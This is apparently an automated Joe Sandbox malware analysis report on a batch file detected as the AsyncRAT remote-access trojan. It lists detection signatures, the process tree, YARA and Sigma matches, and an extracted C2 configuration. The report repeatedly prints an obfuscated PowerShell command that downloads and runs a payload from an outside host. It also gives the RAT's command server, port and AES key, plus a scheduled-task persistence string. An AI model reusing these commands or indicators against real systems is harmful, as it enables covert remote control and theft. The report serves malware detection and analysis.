Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pe4905VGl1.bat

Overview

General Information

Sample name:Pe4905VGl1.bat
renamed because original name is a hash value
Original sample name:5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b.bat
Analysis ID:1562421
MD5:4527c576f1af0580c8d96ac23c8f761c
SHA1:dac3bf00eeb34c9c1d9dca63973f2e04da045383
SHA256:5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b
Tags:batducksex-ddnsfree-comuser-JAMESWT_MHT
Infos:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Yara detected AsyncRAT
Yara detected Powershell decode and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected MSILLoadEncryptedAssembly
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 1872 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2160 cmdline: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2216 cmdline: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • taskkill.exe (PID: 2616 cmdline: "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6744 cmdline: "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1056 cmdline: "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2044 cmdline: "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7104 cmdline: "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6932 cmdline: "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4424 cmdline: "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 3528 cmdline: "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5012 cmdline: "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 416 cmdline: "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • wscript.exe (PID: 1976 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • cmd.exe (PID: 6764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1012 cmdline: PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • aspnet_compiler.exe (PID: 4200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • aspnet_compiler.exe (PID: 6676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"External_config_on_Pastebin": "null", "Server": "ducksex.ddnsfree.com", "Ports": "6161", "Version": "| CRACKED BY DEXTER-LY", "Autorun": "false", "Install_Folder": "UW1DWFNXQjRwTmZCcFN1WmRScE1TVEFQNkpZbmhIZWs=", "Install_File": "sM1ePJDTnlj3DtRAz7+dWOd5NGp5JQWsyrDZoPOlJQDTb6jNyWYXx3QMnyuazNtSs7TQ57FEdZieCqG12wLzhyExZMmCcwHl79x+3yuqL/o=", "AES_key": "QmCXSWB4pNfBpSuZdRpMSTAP6JYnhHek", "Mutex": "GG80pUNCFqeIBsLjHLFYJTVxcawRFwtyGo3CUv8xEr0FQ6fayqNqTizrEpLDnkgAkRFa6hxF8dqxu+8cWlEx829UEfZzHcDtfExYTn9JPBWbtOKZfw4jPt8BlpiKdSTcCPZcxhdww4SzQGSarZOzg+MYK1z13oJY6L5BAe2N9KV9U5sFSnNdnFxb3SV0JNc7e9PKmLRCiUgzHl8Q8taRcYgRrN3tD4w0o2FHstUZu246ixPat3z7xwdfym33m3Jstui7wHMCAjdaNH7DrBk5e0floJOx+2JRpCMlGENd9s5KiTp0ZHYtf1uTvLnza2eOL0IKBAJlscjt3Po1R2XyBJPSEp+aKzENQnfU45Bmab8RuRIzLbge67JD2+kLLP0Een/8+4UAdZz1Mj1xDhI2HumHhSzchUaWN7LCuXk6O3HsHv3d5e2sdrZkBmyJWGFQWGqN0clCQDqFOEFO5TcGZ0qL2A/obsKfDkuDm5s7FbE0cd6rw8PytF8ssXzTgg/lSrAXPNC03HV5KKrApYl04Tztmm/K0cWqyfE5TWWyn9ipBYoXOVgklba41/DMtIqIlCFGpMkkY8L8EdMLZRvslLCAiBnCm2SLqiBYivVWNIYDGfTOpAwchUWV3QfR5AtB8MgH5s4DJG7/RR4k2rNxE+dVRdMRR12ntFI+rGmuVQk=", "Certificate": "false", "ServerSignature": "true", "BDOS": "false", "Startup_Delay": "3", "Group": "null"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Pe4905VGl1.batJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    Pe4905VGl1.batSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x1263:$r1: p^O^w^e^r^S^h^E^l^l
    • 0x1263:$r2: p^O^w^e^r^S^h^E^l^l

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2026750928.000002E7E3053000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MSIL_Load_Encrypted_AssemblyYara detected MSIL_Load_Encrypted_AssemblyJoe Security
      00000004.00000002.1865192800.000002E7C8CF4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MSIL_Load_Encrypted_AssemblyYara detected MSIL_Load_Encrypted_AssemblyJoe Security
        00000004.00000002.1865192800.000002E7C8C60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MSIL_Load_Encrypted_AssemblyYara detected MSIL_Load_Encrypted_AssemblyJoe Security
          00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
            • 0xcf68:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
            • 0x10238:$a2: Stub.exe
            • 0x102c8:$a2: Stub.exe
            • 0x9698:$a3: get_ActivatePong
            • 0xd180:$a4: vmware
            • 0xcff8:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
            • 0xa7e8:$a6: get_SslClient
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              19.2.powershell.exe.25702485170.7.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                21.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  19.2.powershell.exe.25702485170.7.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
                  • 0xb368:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
                  • 0xe238:$a2: Stub.exe
                  • 0xe2c8:$a2: Stub.exe
                  • 0x7a98:$a3: get_ActivatePong
                  • 0xb580:$a4: vmware
                  • 0xb3f8:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                  • 0x8be8:$a6: get_SslClient
                  19.2.powershell.exe.257018be6f0.2.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    Click to see the 25 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_2216.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                      amsi64_2216.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                      • 0xc09d:$b2: ::FromBase64String(
                      • 0xb9d6:$s1: -join
                      • 0x4dfe0:$s1: -join
                      • 0x5182:$s4: +=
                      • 0x5244:$s4: +=
                      • 0x946b:$s4: +=
                      • 0xb588:$s4: +=
                      • 0xb872:$s4: +=
                      • 0xb9b8:$s4: +=
                      • 0x50013:$s4: +=
                      • 0x5006b:$s4: +=
                      • 0x5008f:$s4: +=
                      • 0x500f3:$s4: +=
                      • 0x5405e:$s4: +=
                      • 0x540de:$s4: +=
                      • 0x541a4:$s4: +=
                      • 0x54224:$s4: +=
                      • 0x543fa:$s4: +=
                      • 0x5447e:$s4: +=
                      • 0x4e8a7:$e4: Get-WmiObject
                      • 0x4ea96:$e4: Get-Process

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Potentially Suspicious PowerShell Child Processes
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2216, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , ProcessId: 1976, ProcessName: wscript.exe
                      Sigma detected: Powerup Write Hijack DLL
                      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2216, TargetFilename: C:\Users\Public\AXAGFIIEZBBS.bat
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2216, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , ProcessId: 1976, ProcessName: wscript.exe
                      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2216, TargetFilename: C:\Users\Public\AXAGFIIEZBBS.bat
                      Sigma detected: AspNetCompiler Execution
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1012, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 4200, ProcessName: aspnet_compiler.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: (D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2160, ParentProcessName: cmd.exe, ProcessCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 2216, ProcessName: powershell.exe
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2216, TargetFilename: C:\Users\Public\AXAGFIIEZBBS.bat
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1872, ParentProcessName: cmd.exe, ProcessCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 2160, ProcessName: cmd.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2216, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" , ProcessId: 1976, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: (D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2160, ParentProcessName: cmd.exe, ProcessCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 2216, ProcessName: powershell.exe
                      Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2216, TargetFilename: C:\Users\Public\LMKGJHPBNG.ps1

                      Data Obfuscation

                      barindex
                      Sigma detected: Powershell Download and Execute IEX
                      Source: Process startedAuthor: Joe Security: Data: Command: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1872, ParentProcessName: cmd.exe, ProcessCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 2160, ProcessName: cmd.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
